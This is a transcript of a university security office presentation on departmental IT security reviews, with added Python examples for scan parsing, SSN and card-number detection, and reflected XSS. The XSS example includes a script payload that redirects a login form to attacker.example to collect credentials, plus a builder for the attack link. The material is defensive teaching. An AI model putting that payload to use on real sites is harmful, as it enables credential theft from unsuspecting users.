IT Security Reviews - PowerPoint PPT Presentation

Slides: 25
Provided by: secur9

Transcript and Presenter's Notes

1
IT Security Reviews
  • Brad Tilley

2
This Can Happen To Your Data
3
Purpose of Security Reviews
  • Growing concern about data disclosure at
    Universities
  • Executive Vice President established funds for an
    IT Security Review program
  • Can be considered a pre-audit to help departments
    prepare for real audits
  • Also to help ensure that offices are in
    compliance with federal and state laws.
  • Identify departments on campus with sensitive
    data issues through their risk analysis
  • Help departments recognize their vulnerabilities
    and offer alternatives
  • Prevent data disclosures and possible
    manipulations
  • We don't want to be front-page news

4
Types of Security Reviews
  • Internal Payment Card Industry (PCI) Security
    review
    • Depts that handle credit card transactions
    • List supplied by University Controller's office
    • Ensure depts are following appropriate items in
      the PCI security standard
  • General Security review
    • Depts that handle sensitive information
      (student information, confidential information)
    • Initial focus on academic depts
      • List provided by Registrar's office
      • Academic depts, Deans' offices
    • Sponsored research
      • Export control issues
      • Human subject research

5
Security Review Process
  • Entrance meeting
    • Initial documents submitted to ISO
    • PCI survey (if needed)
    • Sensitive data survey (FERPA, etc.)
  • Field work
    • Document all machines
    • Verify firewalls, vulnerability scans
    • Penetration test
    • Network and WWW-based applications review
    • Local system security check
    • Physical security, backup check
    • Mobile system review (laptop, PDA)
  • Prepare report
    • Review findings with client
  • Exit meeting
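The "document all machines" and "verify firewalls, vulnerability scans" field-work steps produce scan output that has to be turned into findings. The following is an added example, not code from the presentation or the VT IT Security Office: it parses Nmap grepable (-oG) output and flags hosts exposing remote-access services (RDP, VNC, telnet, SSH) that a departmental workstation should not expose, which is the "limit remote access on workstations" finding reported later in the talk. The scan text, the host names and the port list are constructed for illustration and are assumptions, not a real scan or the office's checklist.

```python
"""Parse nmap grepable (-oG) output from a review's scan step and flag
hosts exposing remote-access services.

Added example; not part of the original presentation. The scan output
below is constructed (not a real scan), and the port list and report
shape are assumptions rather than the Security Office's checklist.
"""
import re

# Services a departmental workstation normally should not expose.
REMOTE_ACCESS_PORTS = {
    22: "ssh",
    23: "telnet",
    3389: "rdp",
    5900: "vnc",
    5800: "vnc-http",
}

# Constructed sample of `nmap -sV -oG -` output (hosts and IPs invented).
SAMPLE_SCAN = """\
# Nmap 7.80 scan initiated Mon Mar  3 09:00:00 2008 as: nmap -sV -oG - 10.1.2.0/28
Host: 10.1.2.10 (ws-a01.example.edu)\tStatus: Up
Host: 10.1.2.10 (ws-a01.example.edu)\tPorts: 135/open/tcp//msrpc///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (998)
Host: 10.1.2.11 (ws-a02.example.edu)\tStatus: Up
Host: 10.1.2.11 (ws-a02.example.edu)\tPorts: 445/open/tcp//microsoft-ds///, 5900/open/tcp//vnc//VNC (protocol 3.8)/\tIgnored State: closed (998)
Host: 10.1.2.20 (fileserver.example.edu)\tStatus: Up
Host: 10.1.2.20 (fileserver.example.edu)\tPorts: 22/open/tcp//ssh//OpenSSH 4.7/, 445/open/tcp//microsoft-ds///\tIgnored State: filtered (998)
Host: 10.1.2.30 (printer.example.edu)\tStatus: Up
Host: 10.1.2.30 (printer.example.edu)\tPorts: 9100/open/tcp//jetdirect///, 23/filtered/tcp//telnet///\tIgnored State: closed (998)
# Nmap done at Mon Mar  3 09:02:11 2008 -- 16 IP addresses (4 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")


def parse_grepable(text):
    """Return {ip: {"name": hostname, "ports": {port: (state, service)}}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment line
        ip, name, rest = m.groups()
        entry = hosts.setdefault(ip, {"name": name, "ports": {}})
        for field in rest.split("\t"):
            if not field.startswith("Ports: "):
                continue  # "Status:" or "Ignored State:" field
            for spec in field[len("Ports: "):].split(", "):
                # grepable port syntax: port/state/protocol/owner/service/rpc/version/
                parts = spec.split("/")
                port, state, proto, service = int(parts[0]), parts[1], parts[2], parts[4]
                if proto == "tcp":
                    entry["ports"][port] = (state, service)
    return hosts


def remote_access_findings(hosts, server_names=()):
    """List (ip, hostname, port, label) for open remote-access ports on hosts
    not on the known-server list: SSH on a file server is expected, RDP or
    VNC reachable on a workstation is the finding."""
    findings = []
    for ip, entry in sorted(hosts.items()):
        if entry["name"] in server_names:
            continue
        for port, (state, _service) in sorted(entry["ports"].items()):
            if state == "open" and port in REMOTE_ACCESS_PORTS:
                findings.append((ip, entry["name"], port, REMOTE_ACCESS_PORTS[port]))
    return findings


if __name__ == "__main__":
    scanned = parse_grepable(SAMPLE_SCAN)
    for ip, name, port, label in remote_access_findings(scanned, {"fileserver.example.edu"}):
        print(f"{name} ({ip}): {label} open on tcp/{port} -- restrict with host firewall or remove")
```

Filtered ports (the printer's telnet) are deliberately not reported: the firewall check on the same slide is what confirms they stay filtered from the relevant networks, and reporting them would bury the two workstations that actually answer.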

6
Permission Memo
grant authorization to specific members of the
IT Security Office to conduct vulnerability
assessments and penetration tests against the
University's assets. To that end, the undersigned
attests to the following:
1) ITSO has permission to scan the University's
   computer equipment and network to find
   vulnerabilities.
2) The Vice President for Information Technology
   has the authority to grant this permission for
   testing the University's information technology
   assets.
3) Prior approval must be obtained from each
   Department Head prior to conducting vulnerability
   assessments and penetration testing on the
   individual Department's information technology
   assets.
7
Security Review Process
  • Security Review Project Plan
  • PCI Standard v1.1
  • PCI Questionnaire
8
PCI Standards
  • Preferred method of handling credit card
    transactions on the web
  • Use only a PCI compliant vendor
  • Redirect Method

9
PCI Standards
  • Preferred method of handling credit card
    transactions either in person or over the phone.
  • Offline Method (via Phone Line)
  • Phone line should be set to not allow incoming
    calls

10
PCI Standards
  • Alternate method of handling credit card
    transactions in person or over the phone (via the
    internet)
  • Secure Method (Client Processor)
  • No data is stored and all incoming connection
    attempts are denied

11
PCI Standards
  • Less desirable method of handling credit cards
  • You take a high level of responsibility for
    payment card data
  • PCI Standards require a secure infrastructure to
    be maintained
  • This requires you to install and maintain
    networking hardware
  • Secure Infrastructure

12
Security Review Tools
  • Documentation (will be online in the future)
    • Host and application lists
    • PCI questionnaire
  • Vulnerability scanning / pen. test
    • Nessus
    • Nmap
    • Core Impact, Acunetix (commercial tools)
    • Rapid7 Nexpose (commercial tool)
  • Local security
    • Center for Internet Security NGTool
    • Find_SSNs / Find_CCNs scan tool
    • Cornell University's Spider
  • Network applications
    • WebScarab, Paros
  • Physical security and back-ups

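The "local security" tools above (Find_SSNs / Find_CCNs, Cornell's Spider) all do one thing: walk a department's files and look for Social Security numbers and payment card numbers that should not be sitting in old spreadsheets. The following is an added example of that check, written here to show what those tools do; it is not code from any of them or from the presentation. The sample CSV is constructed (the card numbers are the public test numbers for Visa and Mastercard, not real accounts), and the SSN-validity rules are the commonly published SSA ranges, which a reviewer should confirm against whichever tool is actually run.

```python
"""Scan files for Social Security numbers and payment card numbers,
suppressing the false positives a bare regex would produce.

Added example, not code from Find_SSNs, Spider or the presentation.
Sample data is constructed; the SSN range rules are assumptions taken
from commonly published SSA allocation rules.
"""
import os
import re
import tempfile

SSN_RE = re.compile(r"(?<![\w-])(\d{3})-(\d{2})-(\d{4})(?![\w-])")
# 13-19 digits, optionally separated by single spaces or dashes.
CCN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def plausible_ssn(area, group, serial):
    """Reject SSNs the SSA never issued: area 000/666/9xx, group 00, serial 0000."""
    if area in ("000", "666") or area.startswith("9"):
        return False
    return group != "00" and serial != "0000"


def luhn_ok(digits):
    """Luhn mod-10 checksum shared by all major card brands."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_text(text):
    """Return [(kind, line_number, masked_value)]; values are masked so the
    review report itself does not become a data exposure."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in SSN_RE.finditer(line):
            if plausible_ssn(*m.groups()):
                findings.append(("ssn", lineno, "***-**-" + m.group(3)))
        for m in CCN_RE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group(0))
            if 13 <= len(digits) <= 19 and luhn_ok(digits):
                findings.append(("ccn", lineno, "*" * (len(digits) - 4) + digits[-4:]))
    return findings


def scan_tree(root, extensions=(".txt", ".csv", ".log")):
    """Walk a directory and return {path: findings} for files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[path] = hits
    return report


# Constructed "old spreadsheet" export. Row 2 has an unissued SSN (area 000),
# row 3 an unissued SSN (area 9xx) and a 16-digit number that fails Luhn.
SAMPLE_CSV = """\
id,name,ssn,card,phone
1,Alice Example,123-45-6789,4111 1111 1111 1111,540-231-0000
2,Bob Example,000-12-3456,5555-5555-5555-4444,540-231-0001
3,Carol Example,987-65-4320,1234567812345678,540-231-0002
"""


def demo():
    """Write the sample into a temp directory, scan it, return {filename: hits}."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "old_roster.csv"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CSV)
        with open(os.path.join(tmp, "notes.txt"), "w", encoding="utf-8") as fh:
            fh.write("nothing sensitive here\n")
        return {os.path.basename(p): hits for p, hits in scan_tree(tmp).items()}


if __name__ == "__main__":
    for fname, hits in demo().items():
        for kind, lineno, masked in hits:
            print(f"{fname}:{lineno}: {kind} {masked}")
```

The phone numbers in the sample never match: they are ten digits, below the 13-digit card minimum, and do not fit the 3-2-4 SSN shape. Real tools add more (Excel and PDF extraction, proximity keywords such as "SSN" or "Visa" to raise confidence), but the two validators are what keep a department from chasing every nine-digit string in its files.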
The soft nougat center
13
(No Transcript)
14
(No Transcript)
15
Core Impact
16
Security Review Website
17
Security Review Website
18
Security Review Website
19
Security Review Report
  • The report is the final result of the review
  • Identify weaknesses and data exposures in
    departmental systems
  • Report is discussed with the department technical
    contact prior to the exit meeting.
  • Draft report is presented to department head at
    the exit meeting
  • Changes are made if any noted in exit meeting
  • Final version sent to all parties involved
    including VP for Information Technology
  • Detailed review data is available on website
  • If any critical issues are found, we will check
    back later to make sure changes are made

20
Example Report
  • Security Review Findings
  • Critical Issues
  • Cross-site scripting vulnerability with ?????s
    website
  • Potential Impact
  • Cross-site scripting vulnerabilities allow an
    attacker to run script of their choosing in the
    browser of anyone who follows a crafted link to
    the site. That script can redirect the user to
    another site or send form data elsewhere without
    the user's knowledge, so sensitive information
    could be sent to an unknown site without the
    sender's knowledge. This vulnerability does not
    exist on any ????? department system; rather, it
    exists on the ????? vendor WWW site.
  • Recommendation
  • The ????? Department has notified ????? of this
    vulnerability. The department should verify the
    vulnerability has been fixed as soon as possible.
  • Medium Security Issues
  • Machine names are actual employee names
  • Potential Impact
  • Desktop workstations are given hostnames of the
    owner. This piece of information can be used to
    determine the sensitivity or criticality of any
    data stored on that system.
  • Recommendation
  • Rename all desktop workstations using a generic
    formula.

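The critical finding above is on a vendor's site, so the department can only report it and then verify the fix. As an added example (not code from the presentation, the department or the unnamed vendor), the block below shows the rendering pattern behind a reflected cross-site scripting bug, the hardened version, the kind of payload that produces the impact the report describes, and a probe check a department can run against the vendor's page once the fix is reported. The page layout, the vendor URL and the probe string are assumptions.

```python
"""Reflected XSS: vulnerable rendering, hardened rendering, and the
probe check used to verify a reported fix.

Added example; not from the original presentation or any vendor's site.
The page shape, the vendor.example URL and the probe marker are assumed.
"""
import html
import urllib.parse


def render_search_vulnerable(query):
    """Echoes the query into the page unescaped, so a link carrying
    ?q=<script>...</script> runs that script in the victim's browser."""
    return (
        "<html><body><h1>Results</h1>"
        f"<p>You searched for: {query}</p>"
        '<form action="/login" method="post">'
        '<input name="user"><input name="pass" type="password"></form>'
        "</body></html>"
    )


def render_search_hardened(query):
    """Same page with the query HTML-escaped; quote=True also escapes
    quote characters so the value is safe inside attributes."""
    return (
        "<html><body><h1>Results</h1>"
        f"<p>You searched for: {html.escape(query, quote=True)}</p>"
        '<form action="/login" method="post">'
        '<input name="user"><input name="pass" type="password"></form>'
        "</body></html>"
    )


# The payload behind the report's impact statement: it rewrites the login
# form on the page so credentials are posted to a site the user never chose.
PAYLOAD = (
    "<script>document.forms[0].action="
    "'http://attacker.example/collect'</script>"
)


def reflects_unescaped(page, probe):
    """True if the probe appears in the page verbatim, meaning the site did
    not neutralise the characters that make it markup."""
    return probe in page


def verify_fix(render, probe="<xss-probe-1>"):
    """Verification a department can perform after the vendor reports a fix.
    `render` stands in for fetching the search URL with the probe as the
    query parameter and returning the response body. True means fixed."""
    page = render(probe)
    return not reflects_unescaped(page, probe)


def attack_url(base="http://vendor.example/search", payload=PAYLOAD):
    """The link an attacker would distribute; URL-encoding keeps the payload
    intact through the browser and server."""
    return base + "?" + urllib.parse.urlencode({"q": payload})


if __name__ == "__main__":
    print(attack_url())
    print("vulnerable page fixed?", verify_fix(render_search_vulnerable))
    print("hardened page fixed?", verify_fix(render_search_hardened))
```

Using a harmless marker such as `<xss-probe-1>` rather than a live script is deliberate: the department has no authorisation to exploit the vendor's system, only to confirm that angle brackets and quotes come back encoded.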
21
Example Report
  • Insufficient system support personnel for future
    growth
  • Potential Impact
  • ????? is planning to manage a significantly
    larger number of systems in the near future.
    ????? ability to maintain a high level of
    security may decline if its computer support
    staff is not increased. A good ratio of systems
    to support staff is 20:1 for departments with
    significant end user support.
  • Recommendation
  • Consider expanding the computer system support
    staff in order to maintain the high level of
    security currently practiced by ?????. Consider
    having primary and backup staff for any critical
    support functions.
  • Potentially sensitive data stored locally on
    laptops
  • Potential Impact
  • Laptops by nature are portable. This makes it
    easy for them to be lost or stolen. The
    University has laptops that are stolen or lost
    every year and are rarely recovered. In the
    event this happens, the first concern is that
    your department will be able to continue
    operating if data needed was lost. The second is
    the misuse of that data. Any sensitive
    information that is stored on a laptop in the
    clear will be potentially exposed.
  • Recommendation
  • Instruct users to minimize data stored locally on
    laptops and instead use the VPN to a file share.
    If sensitive files are stored on a laptop, follow
    the previous recommendation.

22
Example Report
  • Ethernet port for kiosk partially accessible
  • Potential Impact
  • Each user of an Ethernet portal from CNS will be
    held responsible for any use or misuse of the
    network. If a person were to connect a machine
    to the wall portal in the hallway, and perform
    malicious activities it would be traced back to
    the owner of the portal. Note that wireless
    network access is controlled by CNS and requires
    authentication for use and is therefore traceable
    to that user.
  • Recommendation
  • Consider covering the wall port for the kiosk by
    either sliding the cabinet to cover it or some
    other way.
  • General Recommendations (for all departments)
  • Consider providing technical training for support
    personnel such as the SANS classes offered
    through the Security Office in the spring.
  • Consider providing security awareness training
    for all office staff including anyone who has
    access to sensitive data.
  • If your department is accepting credit card
    payments, consider using a redirecting service
    rather than storing any credit card information
    on Virginia Tech systems.

23
What we've seen so far
  • Need IT staff for departments
    • Depts with critical data need IT support
    • Central IT support isn't always the answer
  • Operating system security is good
    • Patches applied
    • Cannot gain access with Core Impact (yet)
  • Digital pack rats
    • Old spreadsheets have a high risk for data
      disclosure
    • If unsure of retention or archive policies,
      contact Records Management
  • Remote access (GUI, terminal)
    • Limit usage on workstations and vendor access
  • Security awareness needed
    • Every employee needs to know the policies and
      regulations (FERPA, etc.) that govern their data
  • Overall, better than expected

24
Contact Information
  • Brad Tilley, IT Security Analyst, 1300 Torgersen
    Hall, VA Tech, Blacksburg, VA 24060
  • 540-231-0635, rtilley_at_vt.edu
  • Randy Marchany, VA Tech IT Security Lab Director,
    1300 Torgersen Hall, VA Tech, Blacksburg, VA
    24060
  • 540-231-9523, marchany_at_vt.edu
  • http://security.vt.edu